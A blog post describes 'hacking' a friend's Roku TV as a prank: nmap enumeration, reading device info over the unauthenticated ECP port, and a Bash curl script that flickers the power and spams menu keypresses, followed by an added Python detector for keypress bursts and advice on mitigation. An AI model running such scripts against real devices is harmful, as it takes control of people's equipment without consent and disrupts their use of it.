There are few things in life that I enjoy more than a good prank, and as I casually sifted through the network traffic of a friend who challenged me to “hack them,” I came across something interesting. A UPnP packet bounced across the screen of my Wireshark capture, and as I combed through the data, I realized that I had struck gold. With a little more enumeration, a sprinkle of XML, and some Googling, I had uncovered how I would “hack” my friend (or potential future enemy).
It Began With Enumeration:
nmap -sV -O -n -T4 192.168.X.X/24
As I loudly scanned the network, I was met with version numbers, OS guesses, and even a manufacturer!
Nmap scan report for 192.168.X.X
Host is up (0.010s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
7000/tcp open rtsp AirTunes rtspd
9080/tcp open http Mongoose httpd
MAC Address: 10:59:32:XX:XX:XX (Roku)
The “Roku” immediately fascinated me, so I began to dig into the services running on the system. I started a Wireshark capture to observe how the device interacted across the network; immediately, a UPnP packet shot across the screen with a LOCATION field consisting of the URL: “http://192.168.X.X:8060/dial/dd.xml.” After navigating to the page and finding another similar “ECP” XML page, I did some research.
https://developer.roku.com/docs/developer-program/debugging/external-control-api.md
I encountered this article on how to interact with Roku devices by sending external control service commands! Bingo! So I asked myself the question, “What can I do with this?”
It Continued With More Enumeration:
After reading the developer’s article, I was curious what other information could be pulled from the device, and I found that this service command provided the most comprehensive information:
http://192.168.X.X:8060/query/device-info
Here are just some examples of what I collected from the device:
<user-device-location>Bedroom</user-device-location>
<power-mode>PowerOn</power-mode>
<supports-find-remote>true</supports-find-remote>
It was in my friend’s bedroom, powered on, and accepted remote commands, so I had even more scope to mess with them. Logically, I scoured the article for input service commands that would let me manipulate the device. Then I thought, “Wait, why manually mess with them when I can automate the process for more fun?” I decided to write a simple Bash script that would repeatedly turn the device on and off, and, upon exiting the first loop, turn the device on, go to the Home Screen, and repeatedly press left and down on the menu. Because the device supported remote commands, I could also have turned the volume up or down on them, but I’ll save that for next time. Here is a rough script that I deployed to mess with them:
#!/bin/bash
# How to mess with someone who has a Roku TV 101
# ECP accepts plain HTTP POSTs on port 8060; "-d ''" makes curl send an empty POST body.
Hahaha=1    # no spaces around "=" in a shell assignment
# Loop 1: flicker the power 100 times
while [ $Hahaha -le 100 ]
do
curl -d '' "http://192.168.X.X:8060/keypress/powerOn"
curl -d '' "http://192.168.X.X:8060/keypress/powerOff"
curl -d '' "http://192.168.X.X:8060/keypress/powerOn"
curl -d '' "http://192.168.X.X:8060/keypress/powerOff"
Hahaha=$((Hahaha + 1))    # without this the loop never ends
done
# Leave the device on and go to the Home Screen
curl -d '' "http://192.168.X.X:8060/keypress/powerOn"
curl -d '' "http://192.168.X.X:8060/keypress/Home"
# Loop 2: wander left and down through the menu 100 times
Hahaha=1    # reset the counter, otherwise the second loop is skipped
while [ $Hahaha -le 100 ]
do
curl -d '' "http://192.168.X.X:8060/keypress/left"
curl -d '' "http://192.168.X.X:8060/keypress/down"
Hahaha=$((Hahaha + 1))
done
echo "Can we still be friends?"
There are endless opportunities for fun with this, as you could write cron jobs, scheduled tasks, and batch files to execute these commands with perfect timing. Not only can this be used for mischievous fun, but if you conveniently want to turn on your TV as you walk through the door at 6:02, this could help with that.
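The flip side of this is worth spelling out: the script above works because ECP listens on port 8060 and accepts POSTs from any host on the same network, with no authentication at all. For whoever owns the network, the useful signal is therefore traffic-based: a single host on the LAN firing a burst of keypress commands (often right after pulling /query/device-info) stands out clearly in HTTP logs. The following script is an added example written for this post, not the author’s code and not anything from Roku; it runs over a constructed, tab-separated log sample loosely modelled on a Zeek-style http.log (ts, src, dst, dst_port, method, uri) and flags any source that sends a threshold number of ECP keypresses within a sliding time window. The log format, the IP addresses, the window and the threshold are all assumptions.

```python
"""Detect bursts of unauthenticated Roku ECP keypress commands in HTTP logs.

Added example; not the author's script and not Roku code. The log format and
all addresses below are constructed for illustration.
"""
import csv
import io
from collections import defaultdict

# Constructed sample, tab-separated: ts, src_ip, dst_ip, dst_port, method, uri.
# 192.168.1.50 queries device-info and then hammers keypresses at 192.168.1.20;
# 192.168.1.77 is a normal remote-control app pressing two keys 30 s apart.
SAMPLE_LOG = """\
1700000000.0\t192.168.1.50\t192.168.1.20\t8060\tGET\t/query/device-info
1700000001.0\t192.168.1.50\t192.168.1.20\t8060\tPOST\t/keypress/PowerOn
1700000001.5\t192.168.1.50\t192.168.1.20\t8060\tPOST\t/keypress/PowerOff
1700000002.0\t192.168.1.50\t192.168.1.20\t8060\tPOST\t/keypress/PowerOn
1700000002.5\t192.168.1.50\t192.168.1.20\t8060\tPOST\t/keypress/PowerOff
1700000003.0\t192.168.1.50\t192.168.1.20\t8060\tPOST\t/keypress/Home
1700000003.5\t192.168.1.50\t192.168.1.20\t8060\tPOST\t/keypress/Left
1700000004.0\t192.168.1.50\t192.168.1.20\t8060\tPOST\t/keypress/Down
1700000004.5\t192.168.1.50\t192.168.1.20\t8060\tPOST\t/keypress/Left
1700000010.0\t192.168.1.77\t192.168.1.20\t8060\tPOST\t/keypress/VolumeUp
1700000040.0\t192.168.1.77\t192.168.1.20\t8060\tPOST\t/keypress/VolumeDown
1700000041.0\t192.168.1.50\t192.168.1.30\t80\tGET\t/index.html
"""

ECP_PORT = 8060          # Roku External Control Protocol port (from the post)
WINDOW_SECONDS = 10.0    # assumed sliding window
THRESHOLD = 5            # assumed: this many keypresses per window is a burst


def parse_log(text):
    """Turn the tab-separated sample into a list of event dicts; skips malformed rows."""
    events = []
    for row in csv.reader(io.StringIO(text), delimiter="\t"):
        if len(row) != 6:
            continue
        ts, src, dst, port, method, uri = row
        events.append({"ts": float(ts), "src": src, "dst": dst,
                       "port": int(port), "method": method, "uri": uri})
    return events


def max_in_window(timestamps, window):
    """Largest number of events falling inside any window of `window` seconds."""
    ts = sorted(timestamps)
    best, start = 0, 0
    for end in range(len(ts)):
        while ts[start] < ts[end] - window:   # slide the window's left edge forward
            start += 1
        best = max(best, end - start + 1)
    return best


def find_ecp_bursts(log_text, window=WINDOW_SECONDS, threshold=THRESHOLD,
                    allowed_sources=()):
    """Return one alert per (src, dst) pair whose keypress rate exceeds the threshold.

    Sources in `allowed_sources` (e.g. a known phone running the official
    remote app) are skipped; device-info queries are recorded as context.
    """
    keypress = defaultdict(list)
    queries = defaultdict(set)
    for e in parse_log(log_text):
        if e["port"] != ECP_PORT:
            continue
        pair = (e["src"], e["dst"])
        if e["method"] == "POST" and e["uri"].startswith("/keypress/"):
            keypress[pair].append(e)
        elif e["uri"].startswith("/query/"):
            queries[pair].add(e["uri"])

    alerts = []
    for (src, dst), evs in keypress.items():
        if src in allowed_sources:
            continue
        peak = max_in_window([e["ts"] for e in evs], window)
        if peak >= threshold:
            alerts.append({
                "src": src,
                "dst": dst,
                "keypresses": len(evs),
                "peak_per_window": peak,
                "keys": sorted({e["uri"].rsplit("/", 1)[1] for e in evs}),
                "preceded_by_query": bool(queries.get((src, dst))),
                "first_ts": min(e["ts"] for e in evs),
                "last_ts": max(e["ts"] for e in evs),
            })
    return alerts


if __name__ == "__main__":
    for alert in find_ecp_bursts(SAMPLE_LOG):
        print(f"ECP keypress burst: {alert['src']} -> {alert['dst']}:{ECP_PORT} "
              f"({alert['keypresses']} keypresses, peak {alert['peak_per_window']}"
              f"/{WINDOW_SECONDS:.0f}s, keys={alert['keys']}, "
              f"device-info queried first={alert['preceded_by_query']})")
```

On the sample this flags only 192.168.1.50, and notes that it queried device-info before the keypress storm, which is exactly the enumerate-then-act sequence the post walks through. Detection is the second-best answer, though: since ECP has no authentication to turn on, the real mitigation is to keep streaming devices on an isolated IoT network segment where untrusted clients cannot reach port 8060, and to check the device’s “Control by mobile apps” network access setting, which can restrict or disable ECP network access.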
All in all, I considered it a successful day: I enumerated the network, learned something new, and had fun while doing it. If you have recommendations for harnessing this script for maximum potential and pranking, feel free to reach out to me on my GitHub (https://github.com/RoseSecurity)!
: wq!